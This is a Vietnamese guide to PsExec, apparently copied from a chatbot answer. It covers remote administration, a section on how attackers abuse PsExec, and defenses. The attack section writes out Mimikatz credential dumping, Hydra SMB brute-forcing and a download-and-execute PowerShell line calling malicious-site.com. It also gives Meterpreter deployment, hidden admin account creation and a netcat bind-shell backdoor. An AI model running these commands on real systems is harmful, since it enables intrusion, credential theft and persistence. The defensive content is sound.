PsExec là một công cụ dòng lệnh mạnh mẽ từ bộ công cụ Sysinternals của Microsoft, cho phép bạn chạy lệnh trên máy từ xa mà không cần đăng nhập trực tiếp. Đây là công cụ hữu ích để quản trị hệ thống, chạy script, cài đặt phần mềm từ xa, hoặc kiểm tra máy chủ.

🔹 Cài đặt PsExec

1. Tải xuống bộ Sysinternals từ Microsoft:
   https://learn.microsoft.com/en-us/sysinternals/downloads/psexec
2. Giải nén tập tin .zip vào một thư mục, ví dụ: C:\PsTools
3. Mở CMD với quyền Administrator và chuyển đến thư mục chứa PsExec:

   cmd
   Sao chépChỉnh sửa
   cd C:\PsTools
   

🔹 Sử dụng PsExec điều khiển máy chủ từ xa

✅ 1. Kiểm tra kết nối máy chủ

Chạy lệnh kiểm tra kết nối đến máy chủ (thay 192.168.1.100 bằng IP máy chủ của bạn):

cmd
Sao chépChỉnh sửa
ping 192.168.1.100

Nếu có phản hồi, bạn có thể tiếp tục với PsExec.

✅ 2. Chạy lệnh trên máy chủ từ xa

Ví dụ chạy cmd trên máy chủ:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau cmd

• \\192.168.1.100: Địa chỉ máy chủ từ xa.
• -u Administrator: Tên tài khoản quản trị trên máy chủ.
• -p MatKhau: Mật khẩu tài khoản quản trị.
• cmd: Chạy Command Prompt trên máy chủ.

🔹 Chạy lệnh không cần mở CMD từ xa (ví dụ kiểm tra thông tin hệ thống):

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau systeminfo

✅ 3. Chạy ứng dụng trên máy chủ từ xa

Ví dụ mở Notepad trên máy chủ:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau notepad

Hoặc chạy ứng dụng có giao diện trên màn hình máy chủ:

cmd
Sao chépChỉnh sửa
psexec -i \\192.168.1.100 -u Administrator -p MatKhau notepad

• -i: Chạy chương trình trên giao diện người dùng.

✅ 4. Cài đặt phần mềm từ xa

Ví dụ cài đặt .exe trên máy chủ:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau -s C:\path\to\setup.exe /silent

• -s: Chạy với quyền SYSTEM
• /silent: Cài đặt mà không hiển thị giao diện.

✅ 5. Tắt hoặc khởi động lại máy chủ

🔹 Khởi động lại máy chủ:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau shutdown -r -t 0

🔹 Tắt máy chủ:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau shutdown -s -t 0

✅ 6. Chạy lệnh với quyền SYSTEM trên máy chủ

Nếu cần chạy với quyền SYSTEM, dùng:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -s cmd

🔹 Lưu ý khi sử dụng PsExec

1. Máy chủ phải bật File and Printer Sharing để nhận kết nối.
2. Tường lửa trên máy chủ cần mở port 445 (File and Printer Sharing).
3. Tài khoản phải có quyền quản trị (Administrator) trên máy chủ.
4. Đảm bảo mật khẩu tài khoản mạnh để tránh lỗ hổng bảo mật.

💡 Nếu gặp lỗi hoặc cần hỗ trợ, bạn có thể mô tả vấn đề cụ thể để mình giúp nhé! 🚀

Hacker có thể lợi dụng PsExec để tấn công và thực thi lệnh từ xa trên hệ thống nếu hệ thống không được bảo vệ đúng cách. Dưới đây là cách họ có thể khai thác và cách bạn có thể phòng chống.

🔥 Cách Hacker Sử Dụng PsExec để Thực Thi Mã Từ Xa

✅ 1. Thu Thập Thông Tin Hệ Thống

Trước khi tấn công, hacker cần thu thập thông tin về hệ thống mục tiêu, bao gồm:

• IP nội bộ của máy chủ hoặc máy tính nạn nhân.
• Tài khoản Administrator hoặc tài khoản có quyền cao.
• Mật khẩu hoặc hash mật khẩu (có thể lấy được qua tấn công brute force, keylogger, hoặc đánh cắp từ hệ thống).

Họ có thể quét mạng nội bộ để tìm máy đang bật:

cmd
Sao chépChỉnh sửa
net view /domain

Hoặc tìm máy chủ đang hoạt động:

cmd
Sao chépChỉnh sửa
nmap -p 445 --open 192.168.1.0/24

✅ 2. Đánh Cắp Thông Tin Đăng Nhập

🔹 Khai thác SMB (Port 445): Hacker có thể dùng công cụ như Mimikatz để trích xuất mật khẩu đã lưu hoặc hash mật khẩu từ máy nạn nhân:

cmd
Sao chépChỉnh sửa
mimikatz
sekurlsa::logonpasswords

🔹 Brute-force mật khẩu: Nếu mật khẩu yếu, hacker có thể thử brute-force bằng Hydra hoặc CrackMapExec:

bash
Sao chépChỉnh sửa
hydra -l Administrator -P passlist.txt 192.168.1.100 smb

✅ 3. Thực Thi Lệnh Từ Xa Bằng PsExec

Khi hacker có được tài khoản Administrator hoặc hash mật khẩu, họ có thể thực thi lệnh từ xa trên máy nạn nhân:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau cmd

Hoặc chạy một payload nguy hiểm, chẳng hạn mở cửa hậu (backdoor):

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious-site.com/payload.ps1')"

Hoặc cài đặt Meterpreter Shell để kiểm soát toàn bộ máy nạn nhân:

cmd
Sao chépChỉnh sửa
psexec \\192.168.1.100 -u Administrator -p MatKhau -s -d -i meterpreter.exe

✅ 4. Duy Trì Quyền Kiểm Soát (Persistence)

Sau khi chiếm được quyền điều khiển, hacker có thể tạo tài khoản ẩn để quay lại sau:

cmd
Sao chépChỉnh sửa
net user hacker P@ssw0rd /add
net localgroup Administrators hacker /add

Hoặc đặt cửa hậu khởi động cùng hệ thống:

cmd
Sao chépChỉnh sửa
schtasks /create /tn "Backdoor" /tr "cmd.exe /c nc -lvp 4444 -e cmd.exe" /sc ONSTART /ru SYSTEM

🚨 Cách Phòng Chống Tấn Công PsExec

Để ngăn chặn hacker sử dụng PsExec để điều khiển hệ thống của bạn, hãy thực hiện các biện pháp bảo vệ sau:

🔐 1. Tắt PsExec Nếu Không Cần Thiết

Nếu bạn không sử dụng PsExec, hãy chặn nó bằng Group Policy:

1. Mở Local Group Policy Editor (gpedit.msc).
2. Điều hướng đến:

   rust
   Sao chépChỉnh sửa
   Computer Configuration -> Windows Settings -> Security Settings -> Software Restriction Policies
   

3. Thêm quy tắc từ chối cho psexec.exe và PSTools.

🔐 2. Tắt SMBv1 và Kiểm Soát Port 445

Vô hiệu hóa SMBv1 (vì đây là cổng thường bị hacker khai thác như EternalBlue):

powershell
Sao chépChỉnh sửa
Set-SmbServerConfiguration -EnableSMB1Protocol $false

Và chặn port 445 nếu không cần thiết:

cmd
Sao chépChỉnh sửa
netsh advfirewall firewall add rule name="Block SMB" dir=in action=block protocol=TCP localport=445

🔐 3. Cấu Hình Windows Firewall Để Chặn PsExec

Chặn PsExec từ xa bằng Windows Defender Firewall:

cmd
Sao chépChỉnh sửa
netsh advfirewall firewall add rule name="Block PsExec" dir=in action=block program="C:\PsTools\psexec.exe"

🔐 4. Hạn Chế Quyền Truy Cập Administrator

• Sử dụng tài khoản chuẩn, không dùng Administrator để đăng nhập thường xuyên.
• Bật UAC (User Account Control) ở mức cao nhất.
• Tắt Remote Administrator Account nếu không cần thiết:

  cmd
  Sao chépChỉnh sửa
  net user Administrator /active:no
  

🔐 5. Bật Windows Defender và Kiểm Soát PsExec

Windows Defender có thể phát hiện PsExec là một công cụ nguy hiểm. Chạy lệnh sau để quét malware trên hệ thống:

powershell
Sao chépChỉnh sửa
Start-MpScan -ScanType FullScan

Bạn cũng có thể chặn PsExec bằng Defender ASR (Attack Surface Reduction):

powershell
Sao chépChỉnh sửa
Set-MpPreference -AttackSurfaceReductionRules_Ids D1E49AAC-8F56-4280-B9BA-993A6D77406C -AttackSurfaceReductionRules_Actions Enabled

🔐 6. Giám Sát PsExec Hoạt Động Trên Hệ Thống

Dùng PowerShell để kiểm tra xem có ai đang dùng PsExec:

powershell
Sao chépChỉnh sửa
Get-WinEvent -LogName Security | Where-Object { $_.Message -match "PsExec" }

Hoặc xem quá trình đang chạy trên máy chủ:

cmd
Sao chépChỉnh sửa
tasklist /svc | findstr "PSEXESVC"

🚀 Kết Luận

PsExec là một công cụ mạnh mẽ, nhưng nếu không được bảo vệ đúng cách, nó có thể trở thành một công cụ nguy hiểm trong tay hacker. Việc quản lý tài khoản, kiểm soát quyền truy cập, chặn SMB và giám sát hệ thống sẽ giúp bạn bảo vệ máy chủ khỏi các cuộc tấn công từ xa.

Nếu bạn có hệ thống quan trọng, hãy cấu hình Firewall, vô hiệu hóa SMBv1, chặn PsExec nếu không cần thiết và giám sát chặt chẽ các hoạt động đáng ngờ! 🚀